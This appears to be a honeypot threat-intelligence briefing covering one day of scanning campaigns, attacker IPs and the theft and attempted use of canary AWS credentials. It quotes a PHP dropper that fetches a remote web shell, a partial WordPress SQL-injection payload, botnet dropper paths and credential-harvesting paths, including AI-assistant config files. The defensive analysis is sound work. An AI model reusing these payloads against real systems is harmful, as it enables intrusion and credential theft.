FLUX FLEET — INTEL BRIEFING №13

Period: 2026-09-07 07:33 – 2026-09-08 07:32 UTC (24h digest window, day 12 of operations)
Sources: 3 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East)
Confidence: High (direct observation; 12-day baseline, every result-tag spike attributed by spot query)

The digest window starts at the previous digest run time, and the +4 h timestamp cast widens the effective query window to ~03:33 UTC on 09-07. Events from 03:33 to 07:33 UTC on 09-07 appear in both this digest and №12's data. The new data starts at 07:33 UTC on 09-07. All times are UTC and quoted from the raw log timestamps. №12's tail (the 34.83.24.21 and 34.23.20.91 runs, the Oracle pair, the crusader control workers) was cross-checked against briefing №12 before this report counted anything as new.

BLUF

This was the fleet's quietest window since day 3: 10,496 events, because CRUSADER-SWEEP did not run and WP-LOGIN-BRUTE kept shrinking. METADATA-HUNT ran three new GCP runners and hit every node — the control runner 136.85.124.29 minted 17 credentials, the first control mints ever, and Tracebit recorded 26 denied Bedrock Converse uses minutes later, so the mint-to-use funnel now draws from all three nodes. NIGHTAGENT returned after its one-day break on a fifth Moroccan residential IP and minted 3 credentials, its first successful mints, with the same unrotated GHSAT token. GCP-ACONF completed a fleet-wide second run, and ORACLE-SWEEP ran a third time with a new one-IP-per-node trio and an expanded actuator/OpenAPI wordlist. No new campaign entered the fleet.

Key Judgements

  1. The canary funnel now draws from every node, and hostile use still buys nothing. Control runner 136.85.124.29 minted 17 credentials at 15:44–15:45 UTC on 09-07 (803 events, 578 paths, 12 POSTs) and Tracebit recorded 26 uses from one use IP — all denied, all Converse. The farm runner 34.22.137.199 repeated the day-11 pattern exactly: 25 mints in 22 seconds, 34 denied uses. The aidev runner 34.104.212.213 drew 0 mints and 13 upstream 400s — aidev's mint path rejected its request shape, the same upstream rejection as №12's control runner. (High confidence — mints and uses both observed, joined on collector IP; three runners, three nodes, one template)
  2. NIGHTAGENT crossed its first credentials and kept its token. 41.140.11.235 (Office National des Postes, MA — the fifth Moroccan residential IP in this lineage) ran the four-step loop on both EU nodes at 06:32–06:45 UTC on 09-08 and minted 3 (1 farm, 2 aidev) — the kit's first mints after three dry runs. The dropper body is verbatim: <?php copy('https://raw.githubusercontent.com/nightagents/nightshell/refs/heads/main/night.php?token=GHSAT0AAAAAACYWDMT5UQIYLJJSWO5KVDNIZYGPEDA','night.php');readfile('night.php'); ?>. The GHSAT token is still the one first captured on №9. (High confidence — full journey and body observed; the token is now a five-window continuity fingerprint)
  3. GCP-ACONF is a standing template with fleet reach. The 93-path AI-config census ran twice more, one fresh GCP IP per node: 34.97.47.229 on aidev at 05:42 UTC and 34.94.37.42 on farm at 11:31 UTC, each 93 events in under one second, zero mints. With №12's control run, the list has now touched all three nodes. (High confidence — identical path inventories confirmed by spot query; three runs, three nodes, same sub-second burst shape)
  4. ORACLE-SWEEP went fleet-wide with a bigger wordlist. A new Oracle trio ran one node each: 140.245.96.64 on aidev (09:54 UTC on 09-07, 50 events, 1 mint), 140.245.108.60 on farm (08:38 UTC, 18 events, 1 mint), 140.245.108.219 on control (00:34 UTC on 09-08, 37 events, 1 mint). All three used the forged Chrome/126 UA. The list grew past .env variants: Spring actuator endpoints (/actuator/env, /actuator/jolokia, /actuator/flyway), OpenAPI specs (/v2/api-docs, /swagger.json, /openapi.json), SQL dumps (/dump.sql, /backup.sql), and literal PostgreSQL URIs of the form /postgresql:/prod_rw:<22-char password>@db.internal:5432/prod with new rotating passwords. (High confidence — UA, census shape, and the prod_rw URI family match the №11–№12 lineage; the actuator and OpenAPI families are new stages)

Active Campaigns (day 12 status)

Recurring campaigns carry ⟳ and their registry names. First-seen signatures carry ⚠ NEW. Signatures, not IPs, are the campaign identity.

⟳ METADATA-HUNT (GCP Vite/IMDS template, forged crawler UAs) — hostile, seventh consecutive GCP day, 42 new mints

  • Actors: Four runners this window. New: 34.22.137.199 (Google LLC, BE) on farm — 839 events, 609 paths, 12 POSTs, 25 mints, zero 400s, 17:26–17:27 UTC on 09-07, 462 distinct UAs. New: 136.85.124.29 (Google LLC, SG) on control — 803 events, 578 paths, 12 POSTs, 17 mints, zero 400s, 15:44–15:45 UTC. New: 34.104.212.213 (Google LLC, JP) on aidev — 777 events, 601 paths, 12 POSTs, 0 mints, 13 × 400, 03:43 UTC on 09-08. №12 tail, not recounted: 34.83.24.21 (farm, 25 mints) and 34.23.20.91 (control, 0 mints, 21 × 400).
  • TTPs: The template is unchanged: /__aws_leak_probe_<hex>__, /@fs/proc/self/environ, /@fs/home/ec2-user/.aws/credentials, /.azure/credentials, /.mcp.json, /.env.local. The farm and control runners rotated the forged crawler UA set per request — the farm runner's 462 distinct UA strings added Claude-SearchBot, meta-externalagent, Perplexity-User, ChatGPT-User, Discordbot, Slackbot-LinkExpanding, WhatsApp, and LinkedInBot to the №11–№12 set. The aidev runner carried a new Vite path: /@fs/proc/self/cwd/.config/gcloud/application_default_credentials.json.
  • Assessment: Three runners, three nodes, one day — the operator now probes the whole fleet before the use phase. Control minted for the first time, so the fleet's weakest node feeds the funnel too. Every observed use is still a denied Bedrock Converse. Watch for a sts:GetCallerIdentity success and for Converse retries that switch region or model; those are the escalation lines.

⟳ NIGHTAGENT (residential MA, phpunit dropper kit) — hostile, returned after one idle day, first mints

  • Actors: 41.140.11.235 (Office National des Postes, MA) on both EU nodes, 06:32–06:45 UTC on 09-08. Farm: 104 events, 9 POSTs, 1 mint. Aidev: 172 events, 18 POSTs, 2 mints. The lineage now covers five MA residential IPs across four days of runs.
  • TTPs: The four-step loop, twice per node: phpunit verify with body <?php echo "NightAgent"?>, dropper to /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php (full body in Key Judgement 2), .git/config + .git/index + .DS_Store census, then /whm, /openid_connect/cpanelid, /login/ with body user=root&pass=wrong, and wp-batch multiplex with body {"requests": [{"method": "POST", "path": "///"}, .... UA rotation between stale Chrome/105–107, Firefox/105–106, and python-requests/2.32.5.
  • Assessment: The kit's daily cadence resumed after one idle window, and the mint attempts finally succeeded — 3 credentials are now hostile-held inventory from this operator. Tracebit recorded no AWS use from them yet. The token and repo remain the search indicator; the token has survived six windows unrotated.

⟳ GCP-ACONF (AI/LLM config census) — hostile, second run, now fleet-wide, zero mints

  • Actors: 34.97.47.229 (Google LLC) on aidev, 05:42 UTC on 09-07, 93 events in 0.4 s. 34.94.37.42 (Google LLC) on farm, 11:31 UTC, 93 events in 0.3 s. №12's 34.106.12.203 covered control. Zero mints on both new runs.
  • TTPs: The unchanged 93-path list: /.aider.env, /.aider.conf.yml, /.aider.model.settings.yml, /.anthropic, /.auth.json, /.vscode/mcp.json, /.claude/mcp.json, /mcp_config.json, /.continue/config.yaml, /.windsurf/mcp.json, /.cursor/config.json, plus claude-credentials, gcp-credentials-json, sql-dump, and backup-archive trap families. Plain Chrome/124-era forged browser UAs, no crawler strings.
  • Assessment: Three runs, three nodes, no mints — the census is a standing probe, not a thief. The farm first-seen AI-config paths (/.vscode/mcp.json, /.claude/mcp.json, /mcp_config.json) are this run's inventory. The template validates the AI-surface traps: it walks every MCP and assistant config path the fleet baits.

⟳ ORACLE-SWEEP (.env/actuator/OpenAPI census) — hostile, third run, first fleet-wide run, 3 mints

  • Actors: One Oracle IP per node, all with the forged Chrome/126.0.0.0 Windows UA: 140.245.96.64 on aidev (09:54 UTC on 09-07, 50 events, 1 mint), 140.245.108.60 on farm (08:38 UTC, 18 events, 1 mint), 140.245.108.219 on control (00:34 UTC on 09-08, 37 events, 1 mint). №12's pair (161.118.243.214, 168.107.91.14) sits in the overlap band and is not recounted.
  • TTPs: The new list adds Spring actuator endpoints (/actuator/env, /actuator/jolokia, /actuator/threaddump, /actuator/flyway, /actuator/logfile), OpenAPI specs (/v2/api-docs, /swagger/v1/swagger.json, /api-docs), SQL dumps (/dump.sql, /backup.sql), and literal PostgreSQL URIs: /postgresql:/prod_rw:eqsVSq3g_JA68258eiCK_w@db.internal:5432/prod on aidev and /postgresql:/prod_rw:TWU4wxZshuEF2-bHKRaNww@db.internal:5432/prod — both GETs, both not-handled.
  • Assessment: The prod_rw URI family links this template to the INFOCREST-KIT credential lineage: INFOCREST POSTs prod_rw credentials to adminer, and ORACLE-SWEEP GETs prod_rw URIs. The 22-character passwords rotate per request in both. The evidence shows two templates that share a credential corpus, not one actor. The actuator and OpenAPI families are new stages, so the fourth run decides whether this list keeps growing.

⟳ INFOCREST-KIT (phpMyAdmin/adminer/wp-batch census) — hostile, fourth operator IP, no adminer POSTs this run

  • Actors: 104.36.50.16 (HostRoyale Technologies, US — the same hosting as №12's second operator 185.141.119.179) on both EU nodes, 17:30–21:35 UTC on 09-07. Farm: 331 events, 21 POSTs, 0 mints. Aidev: 331 events, 21 POSTs, 1 mint. Sixteen rotating UAs: stale Chrome/105–107, Firefox/105–106, Safari/16, and python-requests/2.32.5.
  • TTPs: Tarpit cycling → phpMyAdmin spelling census → .git/config and .git/index.DS_Store → config-bundle JS census (the phpinfo-error and symfony-parameters-yml-error aidev spikes are 12 and 15 events from this IP) → /login/ with body user=root&pass=wrong → wp-batch multiplex with the SQLi body verbatim: {"requests": [{"method": "POST", "path": "///"}, {"method": "POST", "path": "/wp/v2/posts", "body": {"requests": [{"method": "POST", "path": "///"}, {"method": "GET", "path": "/wp/v2/posts/999999?author_exclude=0%29+UNION+SELECT+999999%2C2%2C0x323032302d30312d30312030303a30303a3030.... No adminer credential POSTs this run — the first INFOCREST-shaped run without them.
  • Assessment: Fourth operator, same anatomy minus adminer, and the same hosting provider as run two. The wp-batch SQLi body is byte-identical to №12's, so the kit circulates unchanged. The missing adminer stage and the 4-hour multi-node spread are the two deltas to check on the next run.

⟳ CREDSWEEP family (.env-variant census) — hostile, one escalation, two new operators

  • Actors: 45.148.10.238 (Techoff Srv, NL) ran its third consecutive window, now on both remaining nodes in one day: aidev 08:16–08:20 UTC (375 events, 175 paths, 2 mints) and control 12:19–12:21 UTC (660 events, 273 paths, 1 mint). Eleven all-time mints, and the 10-UA rotation with the Mozlila/5.0 typo forgery is intact. New operator 102.220.161.87 (VPS Dedicated LLC, SI) ran a 512-path directory-fanout census on aidev over 3 hours (23:07 UTC on 09-07 to 02:17 UTC on 09-08): /vendor/.env, /lib/.env, /lab/.env, /cronlab/.env, /cron/.env, /core/Datavase/.env, /database/.env, /saas/.env, /exapi/.env and roughly 500 more, with a pscan-b6aa4206-nonexistent.txt 404 probe, 2 mints. New operator 34.74.198.14 (Google LLC, US) ran a 272-path .env-variant and phpinfo census on farm in 68 seconds (17:42 UTC, 285 events, 0 mints, forged Chrome/131 UA) — a GCP one-off in CREDSWEEP shape. Returned one-offs: 84.21.173.161 (farm, 24 events, 6 UAs, 1 mint, 13:00 UTC), 185.169.252.18 (Contabo FR, aidev, 143 events/91 paths in 32 seconds, stale Chrome/39 UA, 1 mint, 17:18 UTC), 213.209.159.175 (Feo Prest /24, farm, 114 events/112 paths in 6 seconds, Android Facebook-in-app UA, 0 mints, 21:46 UTC). Trace presence: 91.245.74.31 (8 events — fifth consecutive day, no census this time), 176.65.148.71 (2 events).
  • TTPs: Exhaustive .env-variant and credential-file walks, one mint path each. The fanout operator 102.220.161.87 is the first CREDSWEEP actor to spend three hours on one node — every prior census ran in minutes.
  • Assessment: The template keeps recruiting operators faster than the fleet retires them: two new hosting providers this window, one of them GCP. The 45.148.10.238 escalation is now a three-window, three-node arc — it is the most persistent hostile actor in the fleet after the GCP templates.

⟳ GIT-VAULT (git-internals walk) — hostile, new operator on control, 1 mint

  • Actors: 128.24.167.75 on control-1, 10:02–10:04 UTC on 09-07. 62 events, 13 rotating UAs: an honest git/2.39.0 for the git stages, then 12 forged browser UAs and a forged Googlebot/2.1.
  • TTPs: .git internals walk with real object hash fetches: /.git/index, /.git/packed-refs, /.git/refs/heads/main, /.git/logs/HEAD, /.git/objects/pack/, and six /.git/objects/<2-char>/<38-char> paths. One mint at the credential stage.
  • Assessment: First GIT-VAULT run on control and the first run that fetched git object hashes instead of only refs — the operator pulled actual object files from the fake repository. The git/2.39.0 UA is a new continuity fingerprint for this template.

⟳ REGISTRY-HUNT (LeakIX) — borderline, evening wave intact, 5 mints

  • Actors: Five l9scan IPs in the evening wave, 20:16–20:31 UTC on 09-07: 142.93.129.190, 46.101.1.225, 159.223.132.86, 157.245.113.227 on farm; 207.154.197.113 on aidev. DigitalOcean rotating IPs, 41 events each, 1 mint each.
  • TTPs: The fixed WebLogic → Confluence → WHM → Docker-registry journey, unchanged.
  • Assessment: Twelfth consecutive day at the same hour. LeakIX remains a collector that mints; report it, distinguish it from criminal actors.

⟳ WP-LOGIN-BRUTE (distributed credential brute) — hostile, kept shrinking

  • Actors: 66 IPs on the two EU nodes, 84 credential POSTs with 84 distinct bodies, spread across the whole window. Forged browser UAs, node-aware pair corpus unchanged.
  • Assessment: Volume fell 113 → 84 pairs. No mints. The brute is background noise; the growth alarm threshold stays at 200 pairs per window.

⟳ MALWARE-DICT (dropper-URL dictionary replay) — hostile, returned under a new operator after 8 days

  • Actors: 204.76.203.18 (Pfcloud UG, NL, blocklist ipsum:2) on control, 05:02–07:32 UTC on 09-08. 238 events, 236 paths, all GETs, 0 mints. The registry listed this IP as departed; it returned with new behavior.
  • TTPs: Dropper-URL dictionary, URLhaus-style: /bins/morte.arm6, /bins/morte.i686, /bins/morte.x86_64, /bins/sora.spc, /hiddenbin/boatnet.sh4, /hiddenbin/boatnet.x86_64, /hiddenbin/Space.arm7, /00101010101001/morte.arm6, /systemcl/spc, /bot.arm7, and hash-named binaries like /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86. The replayed URLs name IoT botnet dropper families (Morte, Boatnet, Sora).
  • Assessment: The №3–№4 template returned under a different operator and a different node. The dictionary is now ~581 paths strong. The fleet served 404s; the replay validates the fleet as a mirror for feed-driven scanning, not a live host.

⟳ OMEGA-SWEEP (Omegatech /24) — hostile, pool probes only, hoard unchanged

  • Actors: Pool probes on aidev: 94.154.43.105 (9 events), 94.154.43.146, 94.154.43.180, 94.154.43.135 (1 event each), 94.154.43.43 (1 event, 1 mint at /.env, bare Mozilla/5.0 UA). No census operator ran.
  • Assessment: The .43.x probe pool grew to 21 known IPs. The .243 hoard (71 canaries, 8 days, zero AWS use) and the /46 block's 90 unused canaries are unchanged. Tracebit shows no use from any 94.154.46.x-collected credential.

⚠ CRUSADER-SWEEP — idle, second consecutive window

No crusader-worker/1.0 core-list wave and no Firefox/78 git-mirror class ran. The 06:00 UTC wave missed its slot for the first time since №10. The aidev volume collapse (−84%) is this absence plus the №12 overlap tail leaving the window.

Standing actors (persistence check)

  • 45.148.10.238 (Techoff Srv, NL) — third consecutive window, both aidev and control in one day, 3 mints this window, 11 all-time. The Mozlila/5.0 typo forgery is intact. Volume trend: up, node count: 3 of 3 covered in three windows.
  • 91.245.74.31 (PC Astra-net) — fifth consecutive day, but only 8 events this window; the promotion trigger (a >500-event census on a second node) did not fire.
  • 80.94.95.211 (SS-Net, RO) — sixth window in seven: aidev, 51 events, 1 mint, 8 all-time. MSIE 9 and Mail.RU_Bot UAs.
  • 89.248.171.24 / 89.248.172.14 — the uptime-prober pair grew: 312 events across all 3 nodes over 23 hours (paths /, /aaa9, /aab9, aiohttp), plus 2 events on the sibling. Benign-shape, report only.
  • 16.5.0.236 (Hello World UA) — SOHO-router probes continue on all 3 nodes, 32 events.
  • 93.174.93.12 — the /-handshake fixture, 27 events, unchanged.
  • 129.213.151.234 (research-scan/1.0) — farm, 41 events, 1 mint at /.env (№12's run sits in the overlap band; this window adds the mint record). Borderline honest-UA collector.
  • New /-only probers: 89.248.172.33 (aiohttp, 27 events, 3 nodes), 91.224.92.135 (27), 185.218.86.25 (18), 195.182.16.23 (19), 146.190.134.221 (9), 144.202.92.17 (CyberConvoyScout/1.0, 15). All /-handshake only, no mints. Benign-shape.
  • Absent this window: 213.209.159.154 (first absence after three windows; its /24 sibling 213.209.159.175 ran instead), 192.253.248.173, 194.180.49.37 (third), 182.8.227.195, 94.154.46.247, 91.92.241.215, 176.65.148.226, the Hetzner IPv6 git walker.

Benign / research (not hostile)

  • Censys — the odd first-seen control and farm paths (/security.txt, /zxagimz1r, /uorzragcz1a6_tron3) are Censys inventories, not attack paths.
  • CyberConvoyScout/1.0 (144.202.92.17) — new honest-UA banner prober, /-only, 15 events. Add to the benign list.
  • No hostile journeys from Censys, Palo Alto, zgrab, OAI-SearchBot standalone, ModatScanner, or ivre-masscan this window. The OAI-SearchBot string appeared only inside METADATA-HUNT's forged rotation.

Canary credentials

Summary

60 Tracebit alert(s) fired in the window (62 use events across 60 credentials). Fleet sensors minted 70 credentials to 25 collector IPs; 60 credential(s) reached AWS. Use outcomes: 62 failure. Denied operations: Converse×62. 0 call(s) succeeded: . Successes leak identity at most; treat any success beyond sts:GetCallerIdentity as a finding.

Mint → use funnel

Metric Count
Credentials minted (fleet, window) 70
Distinct collector IPs 25
Credentials used in AWS (alerts) 60
Credentials stolen, no observed AWS use in window 10

Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):

Theft IP Sensor Mints (window) Creds used in AWS Use IPs Operations Mint history (6d)
34.22.137.199 canary-farm-1 25 34 1 Converse 25 mints since 2026-09-07 17:26
136.85.124.29 control-1 17 26 1 Converse 17 mints since 2026-09-07 15:44
102.220.161.87 ai-devbox-1 2 0 0 2 mints since 2026-09-07 23:07
41.140.11.235 ai-devbox-1 2 0 0 3 mints since 2026-09-08 06:34
45.148.10.238 ai-devbox-1 2 0 0 11 mints since 2026-09-03 13:30
104.36.50.16 ai-devbox-1 1 0 0 1 mints since 2026-09-07 18:30
128.24.167.75 control-1 1 0 0 1 mints since 2026-09-07 10:02
129.150.39.236 canary-farm-1 1 0 0 1 mints since 2026-09-08 00:18
134.185.90.18 ai-devbox-1 1 0 0 1 mints since 2026-09-08 00:42
140.245.108.219 control-1 1 0 0 1 mints since 2026-09-08 00:33
140.245.108.60 canary-farm-1 1 0 0 1 mints since 2026-09-07 08:38
140.245.96.64 ai-devbox-1 1 0 0 1 mints since 2026-09-07 09:54
142.93.129.190 canary-farm-1 1 0 0 1 mints since 2026-09-07 20:16
144.172.93.238 canary-farm-1 1 0 0 1 mints since 2026-09-07 10:37
157.245.113.227 canary-farm-1 1 0 0 2 mints since 2026-09-04 20:27
159.223.132.86 canary-farm-1 1 0 0 1 mints since 2026-09-07 20:30
185.169.252.18 ai-devbox-1 1 0 0 1 mints since 2026-09-07 17:18
207.154.197.113 ai-devbox-1 1 0 0 1 mints since 2026-09-07 20:28
34.18.71.97 ai-devbox-1 1 0 0 1 mints since 2026-09-07 22:14
35.185.244.160 ai-devbox-1 1 0 0 1 mints since 2026-09-07 07:42
35.221.59.195 canary-farm-1 1 0 0 1 mints since 2026-09-07 11:31
41.140.11.235 canary-farm-1 1 0 0 3 mints since 2026-09-08 06:34
45.148.10.238 control-1 1 0 0 11 mints since 2026-09-03 13:30
46.101.1.225 canary-farm-1 1 0 0 2 mints since 2026-09-03 19:55
80.94.95.211 ai-devbox-1 1 0 0 8 mints since 2026-09-01 23:37
84.21.173.161 canary-farm-1 1 0 0 3 mints since 2026-09-06 22:19
94.154.43.43 ai-devbox-1 1 0 0 1 mints since 2026-09-07 17:12

Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):

  • 94.154.46.243: 71 mints, 2026-09-01 12:13 → 2026-09-04 03:42
  • 104.196.118.131: 25 mints, 2026-09-06 03:25 → 2026-09-06 03:25
  • 34.83.24.21: 25 mints, 2026-09-07 05:10 → 2026-09-07 05:10
  • 94.154.46.247: 18 mints, 2026-09-03 17:01 → 2026-09-06 19:02
  • 194.180.49.37: 16 mints, 2026-09-01 06:00 → 2026-09-04 17:18
  • 207.175.90.192: 13 mints, 2026-09-03 07:50 → 2026-09-03 07:50
  • 34.38.121.96: 13 mints, 2026-09-03 09:30 → 2026-09-03 09:30
  • 34.74.98.8: 13 mints, 2026-09-01 09:19 → 2026-09-01 09:19
  • 196.206.35.222: 12 mints, 2026-09-04 04:09 → 2026-09-04 08:26
  • 94.154.46.244: 12 mints, 2026-09-03 11:42 → 2026-09-03 11:42
  • 94.154.46.249: 12 mints, 2026-09-02 13:07 → 2026-09-02 13:08
  • 34.23.228.150: 11 mints, 2026-09-04 21:35 → 2026-09-04 21:35
  • 45.148.10.238: 11 mints, 2026-09-03 13:30 → 2026-09-07 12:19
  • 87.120.104.29: 11 mints, 2026-09-04 05:06 → 2026-09-04 05:06
  • 94.154.46.248: 10 mints, 2026-09-02 12:43 → 2026-09-02 12:43
  • 136.85.12.249: 8 mints, 2026-09-05 09:28 → 2026-09-05 09:28
  • 80.94.95.211: 8 mints, 2026-09-01 23:37 → 2026-09-07 21:08
  • 91.245.74.31: 7 mints, 2026-09-04 10:52 → 2026-09-06 21:30
  • 23.165.56.117: 6 mints, 2026-09-02 22:58 → 2026-09-03 05:15
  • 41.142.109.20: 6 mints, 2026-09-05 05:09 → 2026-09-05 05:47
  • 72.167.41.202: 6 mints, 2026-09-04 18:22 → 2026-09-04 18:22
  • 167.99.182.39: 4 mints, 2026-09-01 20:50 → 2026-09-05 20:41
  • 182.8.227.195: 4 mints, 2026-09-04 21:16 → 2026-09-06 23:30
  • 185.141.119.179: 4 mints, 2026-09-05 10:17 → 2026-09-05 10:26
  • 31.57.219.158: 4 mints, 2026-09-06 13:11 → 2026-09-06 13:23
  • 94.154.46.250: 4 mints, 2026-09-01 15:55 → 2026-09-01 15:56
  • 130.12.180.77: 3 mints, 2026-09-02 00:04 → 2026-09-02 00:07
  • 139.59.136.184: 3 mints, 2026-09-02 15:14 → 2026-09-06 20:35
  • 164.92.107.174: 3 mints, 2026-09-03 20:39 → 2026-09-05 20:23
  • 167.71.175.236: 3 mints, 2026-09-02 20:10 → 2026-09-05 20:38
  • 185.177.72.53: 3 mints, 2026-09-03 03:26 → 2026-09-03 03:26
  • 213.209.159.154: 3 mints, 2026-09-01 09:55 → 2026-09-06 05:52
  • 41.140.11.235: 3 mints, 2026-09-08 06:34 → 2026-09-08 06:45
  • 84.21.173.161: 3 mints, 2026-09-06 22:19 → 2026-09-07 13:00
  • 91.92.241.215: 3 mints, 2026-09-04 01:31 → 2026-09-04 08:15
  • 91.92.41.55: 3 mints, 2026-09-01 07:53 → 2026-09-02 14:41

Canary-use attribution (briefing prose)

Two mint-to-use pipelines ran this window and both died at the same wall: 34.22.137.199's 25 farm credentials drew 34 denied Converse calls, and 136.85.124.29's 17 control credentials drew 26 more — both from single use IPs, both same-minute. Control minted for the first time and its credentials reached AWS within minutes, so the funnel no longer depends on the EU nodes. NIGHTAGENT's 3 credentials, ORACLE-SWEEP's 3, and CREDSWEEP's 4 are hostile-held inventory with no observed use: the silent count is 10 for the window. The standing hoards are unchanged — 94.154.46.243 still holds 71 credentials at 8 days with zero use, and the /46 block holds 90.

Fleet Observations

  • Canary economics: Digest-window mints 101 (farm 61 / control 24 / aidev 16), all ["aws"] — control's first double-digit day. The true new window holds 70 mints to 25 collectors. All-time: 702 credentials to 266 collector IPs (farm 301, aidev 261, control 140). Mint failures: 55 × 400 (aidev 24, control 21, farm 10), zero 401s. Root cause is upstream rejection of rapid-retry request shapes, not key state: 34.23.20.91 drew 13, 34.104.212.213 drew 13, 136.85.124.29 drew 8, 104.36.50.16 drew 10 — the same operators whose mint attempts raced the burst limiter.
  • XFF forgery: 0 multi-entry chains, 0 empty-clientIp rows — eleventh consecutive clean day post-fix. 1,215 requests carried single-entry XFF.
  • TLS/attribution posture: Farm served 779 https events on sso.rightabouteverything.show territory (1,006 Host-header events), aidev 284 https on inference.fapthropic.com (581 Host-header events). Control stayed deliberately certless: 0 https. The Contabo rDNS Host vmi3177282.contaboserver.net carried 382 aidev events. A new oddity appeared: 152 aidev events arrived with Host: 127.0.0.1 from 21 scattered IPs (/.aws/*, /.env* probes) — origin-spoofing probes against a reverse-proxy assumption. They minted nothing.
  • Volume: Digest window 10,496 events (farm 3,751 −46% / aidev 3,369 −84% / control 3,376 −35%) — the quietest window since day 3. The aidev collapse is CRUSADER-SWEEP's absence: №12's 50,112-event git-mirror class did not return. Every ≥50-event hour attributed: control 06:00 (883) = №12's overlap tail (34.23.20.91, the Oracle pair, crusader control workers); farm 05:00 (877) = №12's 34.83.24.21; control 15:00 (816) = 136.85.124.29; farm 17:00 (1,248) = 34.22.137.199 (839) + 34.74.198.14 (285) + 104.36.50.16's farm leg (109) + 185.169.252.18; control 12:00 (664) = 45.148.10.238; aidev 03:00 (806) = 34.104.212.213 (777).
  • Control discovery velocity: Day-12 ramp reads 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98 → 99 → 108 → 120. Unique IPs set a new record (120) on 3,376 events. The differential dataset continues: the fresh IP now draws more distinct visitors than events per visitor, which is the steady state of a well-discovered node.
  • First-seen inventory (not a timeline): Farm's new AI-config paths (/.vscode/mcp.json, /.claude/mcp.json, /mcp_config.json) are GCP-ACONF's farm run. Control's new actuator/OpenAPI and .env paths (/v2/.env, /api2/.env, /platform/.env, /tests/.env, /cgi-bin/.env) are ORACLE-SWEEP's trio. Aidev's new paths split between 102.220.161.87's fanout (/public/phpinfo.php, /configs.json.bak), 140.245.96.64 (/postgresql:/prod_rw:TWU4wxZshuEF2-bHKRaNww@...), and 34.104.212.213 (/@fs/proc/self/cwd/.config/gcloud/application_default_credentials.json). Censys owns /security.txt, /zxagimz1r, and /uorzragcz1a6_tron3. New UAs are forged strings inside the census operators' rotations, plus the first appearance of the truncated Chrome/12 string on aidev. No new tooling family entered the fleet.
  • Digest quirks (all re-confirmed this run): control-byte-stripped copy needed for UTF-8 reads of the digest; +4 h timestamp cast; single-writer DuckDB lock (all spot queries ran sequentially); sync-arrival first-seen stamps; window overlap with №12 cross-checked — the 34.83.24.21/34.23.20.21 runners, the Oracle №12 pair, and the crusader control workers are №12 data seen again.
  • Infrastructure: no fleet-side changes this cycle.

Gaps / Next Collection

  1. METADATA-HUNT use-phase escalation — 60 of 70 window credentials reached AWS and every call was a denied Converse. The watch items are a sts:GetCallerIdentity success and Converse retries that switch region or model. A third runner cycle on aidev would also show whether the 13 × 400s are shape-specific or node-specific.
  2. NIGHTAGENT's first stolen credentials — the kit minted 3 and Tracebit has not seen them used. Check Tracebit for use outside the log window; the kit holds the only hoard that also drops remote-shell code, so its credentials carry a higher risk of hands-on use.
  3. ORACLE-SWEEP wordlist growth — the third run added actuator, OpenAPI, and SQL-dump families to the .env core. Diff the fourth run's list against this one; a second growth step confirms an active development cycle. Also check whether the rotating prod_rw URI passwords ever repeat a password seen in INFOCREST-KIT's adminer POSTs — a repeat merges the two lineages.
  4. CRUSADER-SWEEP absence — the 06:00 UTC wave missed two consecutive windows after six on-schedule runs. Confirm whether the worker pool retired or paused; a return with POST capability moves the git-mirror class from staging to theft.
  5. Pfcloud dictionary replay — 204.76.203.18 replayed ~581 dropper URLs on control. Correlate the dictionary against a current URLhaus or MalwareURLs feed to date the list; the hash-named paths suggest a specific botnet build campaign.
  6. 91.245.74.31 promotion trigger — fifth consecutive day but only 8 events this window. The trigger stays at a >500-event census on a second node.

Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-08.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (41.140.11.235), plus 9 ad-hoc v_full queries (window actor profile, spike attribution, GCP runner roster, minting-IP roster, standing-actor presence, adminer-body check, Oracle trio journeys, GCP-ACONF path inventories, Host-127.0.0.1 probe set) and the Tracebit canary-section generator.